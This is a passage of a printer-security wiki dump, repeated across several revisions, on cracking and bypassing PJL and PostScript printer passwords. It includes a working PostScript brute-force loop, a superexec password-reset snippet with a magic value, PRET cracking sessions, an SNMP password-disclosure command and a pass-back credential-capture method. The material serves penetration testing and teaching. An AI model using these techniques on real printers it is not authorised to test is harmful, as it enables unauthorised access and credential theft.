65535 possible combinations in a single print job. === PostScript === PostScript offers two types of passwords: The ''SystemParamsPassword'' is used to change print job settings like paper size, while the ''StartJobPassword'' is required to exit the server loop and therefore permanently alter the PostScript environment. The ''checkpassword'' operator which takes either an integer or a string as input checks for both passwords at once <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 194</ref>. The key size is very large: PostScript strings can contain arbitrary ASCII characters and have a maximum length of 65,565 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref> which theoretically allows 524,280 bit passwords. On the positive side (from an attackers point of view) brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing for numerical values as passwords is given below: <syntaxhighlight lang=postscript> /min 0 def /max 1000000 def statusdict begin { min 1 max {dup checkpassword {== flush stop} {pop} ifelse} for } stopped pop </syntaxhighlight> Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's RIP is highly optimized for fast processing of PostScript code. Brother based devices are exceptions as ''BR-Script'' only accepts one password per second but also checks for the very first character of the password only which effectively limits the key size to 256 characters or 8 bit. As it seems, Kyocera's ''KPDL'' does not support setting permanent PostScript passwords at all. Another approach is to '''bypass PostScript passwords''' by resetting them with Adobe's proprietary ''superexec'' operator. This operator resides in the ''internaldict'' dictionary, which is ‘protected’ by a static, magic password (<code>1183615869</code>, see <ref>''[http://www.tinaja.com/glib/interdic.pdf PostScript’s Internaldict, Superexec & the pdfmark Instruction Set]'', D. Lancaster, 2002</ref>). Wrapping PostScript code into ''superexec'' allows an attacker to ignore various protection mechanisms of the language, which would normally raise an ''invalidaccess'' error. This can be used to set PostScript passwords without initially submitting the current password as shown below: <syntaxhighlight lang=postscript> { << /SystemParamsPassword (0) /StartJobPassword (0) >> setsystemparams } 1183615869 internaldict /superexec get exec </syntaxhighlight> '''How to test this attack?''' The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against numeric (integer) PostScript passwords or to bypass them with ''superexec'' magic: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> lock 999 printer:/> unlock No password given, cracking. Device unlocked with password: 999 printer:/> lock S0me_Re4lly_g00d_Passw0rd! printer:/> unlock bypass Resetting password to zero with super-secret PostScript magic Device unlocked with password: 0 '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by cracking it in a single print job. == Password Disclosure == === SNMP === Ancient HP printers (manufactured 2003 and earlier) had a bug which allowed an attacker to retrieve the password for the embedded web server through SNMP requests. The vulnerable OID to be requested (''.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords'') was even documented by HP. Other vendors may have similar SNMP based issues. Penetration testers may find flaws by studying the various publicly available MIBs released by printer manufacturers. '''How to test this attack?''' To test this attack against ancient HP printers, the ''snmpset'' tool can be used as shown below: <syntaxhighlight lang=sh> snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0 iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 … </syntaxhighlight> Vulnerable devices will return the password in hexadecimal (here: ''AAA''), while newer devices do only respond with zerobytes. '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. === Pass-Back === Another interesting class of attacks is pass-back attacks were ‘an MFP device is directed into authenticating [...] against a rogue system rather than the expected server’ <ref>''[http://foofus.net/goons/percx/praeda/pass-back-attack.pdf Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers]'', D. Heiland and M. Belton, 2011</ref>. This works in setups where a printer/MFP authenticates users via an external [https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol LDAP] server. Note that the credentials to access the LDAP server are stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the stored credentials, whenever someone (for example, the attacker itself) tries to authenticate with the MFP, the MFP leaks the original LDAP credentials to the attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. Printers and MFPs – which may offer insufficient protection – are therefore a good starting point in network penetration tests. '''How to test this attack?''' Check if you can change printer settings like the LDAP hostname while keeping the old LDAP password. '''Who can perform this attack?''' Usually anyone who can access the printer's embedded web server. This may include [https://en.wikipedia.org/wiki/Cross-site_request_forgery CRSF] attacker, if the web application running on the printer has no CSRF protection. ---- c5fb7e01735347eeb85242282c0ab589262d4641 604 575 2017-02-08T13:00:19Z 92.228.38.179 0 wikitext text/x-wiki Printers are commonly deployed with a default password or no initial password at all. In both cases, end-users or administrators have to actively set a password to secure the device. This article discusses generic brute-force attacks against PJL and PostScript passwords as well as model specific password disclosure. == Brute-Force Attacks == Besides credentials leaked from sources like [[File system access|file system]] or [[memory access]], [[#SNMP|SNMP]] and the printer's [[#Pass-Back|embedded web server]], printing languages offer limited passwords protection mechanisms themselves. Breaking such mechanisms has a priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model they are standardized for both [[PJL]] and [[PostScript]]. Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can disable some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary. === PJL === PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. PJL disk lock as shown below is the defense mechanism propagated by HP against PJL file system access, including its known path traversal vulnerabilities <ref>''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c02004333 Security Bulletin HPSBPI02575 SSRT090255 Rev. 1]'', HP Inc., 2010</ref>: @PJL JOB PASSWORD=0 @PJL DEFAULT PASSWORD=12345 @PJL DEFAULT DISKLOCK=ON @PJL DEFAULT CPLOCK=ON PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size as demonstrated by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> who were able to unlock the disk protection within 6 hours in the worst case. With PJL interpreters having gotten faster while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65535 <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>, cracking time has efficiently decreased. In a test with 20 devices, between 50 and 1,000 passwords could be evaluated per second leading to average cracking times between 30 seconds and 10 minutes. While PJL passwords can be set on various devices, actual disk lock and/or control panel lock is only supported by few printers. It is unclear if the password has any undocumented, proprietary effects on these machines or is just a dummy variable. Furthermore, non-compliant with the PJL standard, Brother based devices do not even verify the password to lock or unlock the control panel, rendering it practically useless. '''How to test this attack?''' The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against PJL passwords: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> lock 999 PIN protection: ENABLED Panel lock: ON Disk lock: ON printer:/> unlock No PIN given, cracking. PIN protection: DISABLED Panel lock: OFF Disk lock: OFF '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65535 possible combinations in a single print job. === PostScript === PostScript offers two types of passwords: The ''SystemParamsPassword'' is used to change print job settings like paper size, while the ''StartJobPassword'' is required to exit the server loop and therefore permanently alter the PostScript environment. The ''checkpassword'' operator which takes either an integer or a string as input checks for both passwords at once <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 194</ref>. The key size is very large: PostScript strings can contain arbitrary ASCII characters and have a maximum length of 65,565 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref> which theoretically allows 524,280 bit passwords. On the positive side (from an attackers point of view) brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing for numerical values as passwords is given below: <syntaxhighlight lang=postscript> /min 0 def /max 1000000 def statusdict begin { min 1 max {dup checkpassword {== flush stop} {pop} ifelse} for } stopped pop </syntaxhighlight> Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's RIP is highly optimized for fast processing of PostScript code. Brother based devices are exceptions as ''BR-Script'' only accepts one password per second but also checks for the very first character of the password only which effectively limits the key size to 256 characters or 8 bit. As it seems, Kyocera's ''KPDL'' does not support setting permanent PostScript passwords at all. Another approach is to '''bypass PostScript passwords''' by resetting them with Adobe's proprietary ''superexec'' operator. This operator resides in the ''internaldict'' dictionary, which is ‘protected’ by a static, magic password (<code>1183615869</code>, see <ref>''[http://www.tinaja.com/glib/interdic.pdf PostScript’s Internaldict, Superexec & the pdfmark Instruction Set]'', D. Lancaster, 2002</ref>). Wrapping PostScript code into the operator allows an attacker to bypass various protection mechanisms of the language, which would normally raise an ''invalidaccess'' error. This can be used to set PostScript passwords without initially submitting the current password as shown below: <syntaxhighlight lang=postscript> { << /SystemParamsPassword (0) /StartJobPassword (0) >> setsystemparams } 1183615869 internaldict /superexec get exec </syntaxhighlight> '''How to test this attack?''' The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against numeric (integer) PostScript passwords or to bypass them with ''superexec'' magic: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> lock 999 printer:/> unlock No password given, cracking. Device unlocked with password: 999 printer:/> lock S0me_Re4lly_g00d_Passw0rd! printer:/> unlock bypass Resetting password to zero with super-secret PostScript magic Device unlocked with password: 0 '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by cracking it in a single print job. == Password Disclosure == === SNMP === Ancient HP printers (manufactured 2003 and earlier) had a bug which allowed an attacker to retrieve the password for the embedded web server through SNMP requests. The vulnerable OID to be requested (''.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords'') was even documented by HP. Other vendors may have similar SNMP based issues. Penetration testers may find flaws by studying the various publicly available MIBs released by printer manufacturers. '''How to test this attack?''' To test this attack against ancient HP printers, the ''snmpset'' tool can be used as shown below: <syntaxhighlight lang=sh> snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0 iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 … </syntaxhighlight> Vulnerable devices will return the password in hexadecimal (here: ''AAA''), while newer devices do only respond with zerobytes. '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. === Pass-Back === Another interesting class of attacks is pass-back attacks were ‘an MFP device is directed into authenticating [...] against a rogue system rather than the expected server’ <ref>''[http://foofus.net/goons/percx/praeda/pass-back-attack.pdf Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers]'', D. Heiland and M. Belton, 2011</ref>. This works in setups where a printer/MFP authenticates users via an external [https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol LDAP] server. Note that the credentials to access the LDAP server are stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the stored credentials, whenever someone (for example, the attacker itself) tries to authenticate with the MFP, the MFP leaks the original LDAP credentials to the attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. Printers and MFPs – which may offer insufficient protection – are therefore a good starting point in network penetration tests. '''How to test this attack?''' Check if you can change printer settings like the LDAP hostname while keeping the old LDAP password. '''Who can perform this attack?''' Usually anyone who can access the printer's embedded web server. This may include [https://en.wikipedia.org/wiki/Cross-site_request_forgery CRSF] attacker, if the web application running on the printer has no CSRF protection. ---- e9396df37e48f877594ed155ed002c8c6bbeb5e5 575 317 2017-02-08T10:31:37Z 92.228.38.179 0 /* PostScript */ wikitext text/x-wiki Printers are commonly deployed with a default password or no initial password at all. In both cases, end-users or administrators have to actively set a password to secure the device. This article discusses generic brute-force attacks against PJL and PostScript passwords as well as model specific password disclosure. == Brute-Force Attacks == Besides credentials leaked from sources like [[File system access|file system]] or [[memory access]], [[#SNMP|SNMP]] and the printer's [[#Pass-Back|embedded web server]], printing languages offer limited passwords protection mechanisms themselves. Breaking such mechanisms has a priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model they are standardized for both [[PJL]] and [[PostScript]]. Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can disable some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary. === PJL === PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. PJL disk lock as shown below is the defense mechanism propagated by HP against PJL file system access, including its known path traversal vulnerabilities <ref>''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c02004333 Security Bulletin HPSBPI02575 SSRT090255 Rev. 1]'', HP Inc., 2010</ref>: @PJL JOB PASSWORD=0 @PJL DEFAULT PASSWORD=12345 @PJL DEFAULT DISKLOCK=ON @PJL DEFAULT CPLOCK=ON PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size as demonstrated by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> who were able to unlock the disk protection within 6 hours in the worst case. With PJL interpreters having gotten faster while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65535 <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>, cracking time has efficiently decreased. In a test with 20 devices, between 50 and 1,000 passwords could be evaluated per second leading to average cracking times between 30 seconds and 10 minutes. While PJL passwords can be set on various devices, actual disk lock and/or control panel lock is only supported by few printers. It is unclear if the password has any undocumented, proprietary effects on these machines or is just a dummy variable. Furthermore, non-compliant with the PJL standard, Brother based devices do not even verify the password to lock or unlock the control panel, rendering it practically useless. '''How to test this attack?''' The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against PJL passwords: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> lock 999 PIN protection: ENABLED Panel lock: ON Disk lock: ON printer:/> unlock No PIN given, cracking. PIN protection: DISABLED Panel lock: OFF Disk lock: OFF '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65535 possible combinations in a single print job. === PostScript === PostScript offers two types of passwords: The ''SystemParamsPassword'' is used to change print job settings like paper size, while the ''StartJobPassword'' is required to exit the server loop and therefore permanently alter the PostScript environment. The ''checkpassword'' operator which takes either an integer or a string as input checks for both passwords at once <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 194</ref>. The key size is very large: PostScript strings can contain arbitrary ASCII characters and have a maximum length of 65,565 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref> which theoretically allows 524,280 bit passwords. On the positive side (from an attackers point of view) brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing for numerical values as passwords is given below: <syntaxhighlight lang=postscript> /min 0 def /max 1000000 def statusdict begin { min 1 max {dup checkpassword {== flush stop} {pop} ifelse} for } stopped pop </syntaxhighlight> Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's RIP is highly optimized for fast processing of PostScript code. Brother based devices are exceptions as ''BR-Script'' only accepts one password per second but also checks for the very first character of the password only which effectively limits the key size to 256 characters or 8 bit. As it seems, Kyocera's ''KPDL'' does not support setting permanent PostScript passwords at all. '''How to test this attack?''' The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against numeric (integer) PostScript passwords: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> lock 999 printer:/> unlock No password given, cracking. Found password: 999 '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by cracking it in a single print job. == Password Disclosure == === SNMP === Ancient HP printers (manufactured 2003 and earlier) had a bug which allowed an attacker to retrieve the password for the embedded web server through SNMP requests. The vulnerable OID to be requested (''.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords'') was even documented by HP. Other vendors may have similar SNMP based issues. Penetration testers may find flaws by studying the various publicly available MIBs released by printer manufacturers. '''How to test this attack?''' To test this attack against ancient HP printers, the ''snmpset'' tool can be used as shown below: <syntaxhighlight lang=sh> snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0 iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 … </syntaxhighlight> Vulnerable devices will return the password in hexadecimal (here: ''AAA''), while newer devices do only respond with zerobytes. '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. === Pass-Back === Another interesting class of attacks is pass-back attacks were ‘an MFP device is directed into authenticating [...] against a rogue system rather than the expected server’ <ref>''[http://foofus.net/goons/percx/praeda/pass-back-attack.pdf Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers]'', D. Heiland and M. Belton, 2011</ref>. This works in setups where a printer/MFP authenticates users via an external [https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol LDAP] server. Note that the credentials to access the LDAP server are stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the stored credentials, whenever someone (for example, the attacker itself) tries to authenticate with the MFP, the MFP leaks the original LDAP credentials to the attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. Printers and MFPs – which may offer insufficient protection – are therefore a good starting point in network penetration tests. '''How to test this attack?''' Check if you can change printer settings like the LDAP hostname while keeping the old LDAP password. '''Who can perform this attack?''' Usually anyone who can access the printer's embedded web server. This may include [https://en.wikipedia.org/wiki/Cross-site_request_forgery CRSF] attacker, if the web application running on the printer has no CSRF protection. ---- a6a7f54df879eaadb02af3109b3fa30e019546d4 317 189 2017-01-31T08:51:42Z 84.153.135.37 0 wikitext text/x-wiki Printers are commonly deployed with a default password or no initial password at all. In both cases, end-users or administrators have to actively set a password to secure the device. This article discusses generic brute-force attacks against PJL and PostScript passwords as well as model specific password disclosure. == Brute-Force Attacks == Besides credentials leaked from sources like [[File system access|file system]] or [[memory access]], [[#SNMP|SNMP]] and the printer's [[#Pass-Back|embedded web server]], printing languages offer limited passwords protection mechanisms themselves. Breaking such mechanisms has a priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model they are standardized for both [[PJL]] and [[PostScript]]. Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can disable some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary. === PJL === PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. PJL disk lock as shown below is the defense mechanism propagated by HP against PJL file system access, including its known path traversal vulnerabilities <ref>''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c02004333 Security Bulletin HPSBPI02575 SSRT090255 Rev. 1]'', HP Inc., 2010</ref>: @PJL JOB PASSWORD=0 @PJL DEFAULT PASSWORD=12345 @PJL DEFAULT DISKLOCK=ON @PJL DEFAULT CPLOCK=ON PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size as demonstrated by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> who were able to unlock the disk protection within 6 hours in the worst case. With PJL interpreters having gotten faster while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65535 <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>, cracking time has efficiently decreased. In a test with 20 devices, between 50 and 1,000 passwords could be evaluated per second leading to average cracking times between 30 seconds and 10 minutes. While PJL passwords can be set on various devices, actual disk lock and/or control panel lock is only supported by few printers. It is unclear if the password has any undocumented, proprietary effects on these machines or is just a dummy variable. Furthermore, non-compliant with the PJL standard, Brother based devices do not even verify the password to lock or unlock the control panel, rendering it practically useless. '''How to test this attack?''' The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against PJL passwords: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> lock 999 PIN protection: ENABLED Panel lock: ON Disk lock: ON printer:/> unlock No PIN given, cracking. PIN protection: DISABLED Panel lock: OFF Disk lock: OFF '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65535 possible combinations in a single print job. === PostScript === PostScript offers two types of passwords: The ''SystemParamsPassword'' is used to change print job settings like paper size, while the ''StartJobPassword'' is required to exit the server loop and therefore permanently alter the PostScript environment. The ''checkpassword'' operator which takes either an integer or a string as input checks for both passwords at once <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 194</ref>. The key size is very large: PostScript strings can contain arbitrary ASCII characters and have a maximum length of 65,565 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref> which theoretically allows 524,280 bit passwords. On the positive side (from an attackers point of view) brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing for numerical values as passwords is given below: <syntaxhighlight lang=postscript> /min 0 def /max 1000000 def statusdict begin { min 1 max {dup checkpassword {== flush stop} {pop} ifelse} for } stopped pop </syntaxhighlight> Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's RIP is highly optimized for fast processing of PostScript code. Brother based devices are exceptions as ''BR-Script'' only accepts one password per second but also checks for the very first character of the password only which effectively limits the key size to 256 characters or 8 bit. As it seems, Kyocera's ''KPDL'' does not support permanent PostScript passwords at all. '''How to test this attack?''' The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against numeric (integer) PostScript passwords: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> lock 999 printer:/> unlock No password given, cracking. Found password: 999 '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by cracking it in a single print job. == Password Disclosure == === SNMP === Ancient HP printers (manufactured 2003 and earlier) had a bug which allowed an attacker to retrieve the password for the embedded web server through SNMP requests. The vulnerable OID to be requested (''.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords'') was even documented by HP. Other vendors may have similar SNMP based issues. Penetration testers may find flaws by studying the various publicly available MIBs released by printer manufacturers. '''How to test this attack?''' To test this attack against ancient HP printers, the ''snmpset'' tool can be used as shown below: <syntaxhighlight lang=sh> snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0 iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 … </syntaxhighlight> Vulnerable devices will return the password in hexadecimal (here: ''AAA''), while newer devices do only respond with zerobytes. '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. === Pass-Back === Another interesting class of attacks is pass-back attacks were ‘an MFP device is directed into authenticating [...] against a rogue system rather than the expected server’ <ref>''[http://foofus.net/goons/percx/praeda/pass-back-attack.pdf Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers]'', D. Heiland and M. Belton, 2011</ref>. This works in setups where a printer/MFP authenticates users via an external [https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol LDAP] server. Note that the credentials to access the LDAP server are stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the stored credentials, whenever someone (for example, the attacker itself) tries to authenticate with the MFP, the MFP leaks the original LDAP credentials to the attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. Printers and MFPs – which may offer insufficient protection – are therefore a good starting point in network penetration tests. '''How to test this attack?''' Check if you can change printer settings like the LDAP hostname while keeping the old LDAP password. '''Who can perform this attack?''' Usually anyone who can access the printer's embedded web server. This may include [https://en.wikipedia.org/wiki/Cross-site_request_forgery CRSF] attacker, if the web application running on the printer has no CSRF protection. ---- 94f2c76a110b2951a4b5c55c41faa55ba005cd51 189 188 2017-01-22T19:16:59Z Admin 1 wikitext text/x-wiki Printers are commonly deployed with a default password or no initial password at all. In both cases, end-user or administrators have to actively set a password to secure the device. This article discusses generic brute-force attacks against PJL and PostScript passwords as well as model specific password disclosure. == Brute-Force Attacks == Besides credentials leaked from sources like [[File system access|file system]] or [[memory access]], [[#SNMP|SNMP]] and the printer's [[#Pass-Back|embedded web server]], printing languages offer limited passwords protection mechanisms themselves. Breaking such mechanisms has a priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model they are standardized for both, [[PJL]] and [[PostScript]]. Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can break some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary. === PJL === PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. PJL disk lock as shown below is the defense mechanism propagated by HP against PJL file system access, including its known path traversal vulnerabilities <ref>''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c02004333 Security Bulletin HPSBPI02575 SSRT090255 Rev. 1]'', HP Inc., 2010</ref>: @PJL JOB PASSWORD=0 @PJL DEFAULT PASSWORD=12345 @PJL DEFAULT DISKLOCK=ON @PJL DEFAULT CPLOCK=ON PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size as demonstrated by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> who were able to unlock the disk protection within six hours in the worst case. With PJL interpreters having gotten faster while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65535 <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>, cracking time has efficiently decreased. In a test with 20 devices, between 50 and 1,000 passwords could be verfied per second leading to average cracking times between 30 seconds and ten minutes. While PJL passwords can be set on various devices, actual disk lock and/or control panel lock is only supported by few printers. It is unclear if the password has any undocumented, proprietary effects on these machines or is just a dummy variable. Furthermore, non-compliant with the PJL standard, Brother based devices do not even verify the password to lock or unlock the control panel, rendering it practically useless. '''How to test this attack?''' The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against PJL passwords: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> lock 999 PIN protection: ENABLED Panel lock: ON Disk lock: ON printer:/> unlock No PIN given, cracking. PIN protection: DISABLED Panel lock: OFF Disk lock: OFF '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65535 possible combinations in a single print job. === PostScript === PostScript offers two types of passwords: The ''SystemParamsPassword'' is used to change print job settings like paper size while the ''StartJobPassword'' is required to exit the server loop and therefore permanently alter the PostScript environment. The ''checkpassword'' operator which takes either an integer or a string as input checks for both passwords at once <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 194</ref>. The key size is very large: PostScript strings can contain arbitrary ASCII characters and have a maximal length of 65,565 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref> which theoretically allows 524,280 bit passwords. On the positive side (from an attackes point of view) brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing for numerical values as passwords is given below: <syntaxhighlight lang=postscript> /min 0 def /max 1000000 def statusdict begin { min 1 max {dup checkpassword {== flush stop} {pop} ifelse} for } stopped pop \end{lstlisting} </syntaxhighlight> Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's RIP is highly optimized for fast processing of PostScript code. Brother based devices are exceptions as ''BR-Script'' only accepts one password per second but also checks for the very first character of the password only which effectively limits the key size to 256 characters or 8 bit. As it seems, Kyocera's ''KPDL'' does not support permanent PostScript passwords at all. '''How to test this attack?''' The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against numeric (integer) PostScript passwords: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> lock 999 printer:/> unlock No password given, cracking. Found password: 999 '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], 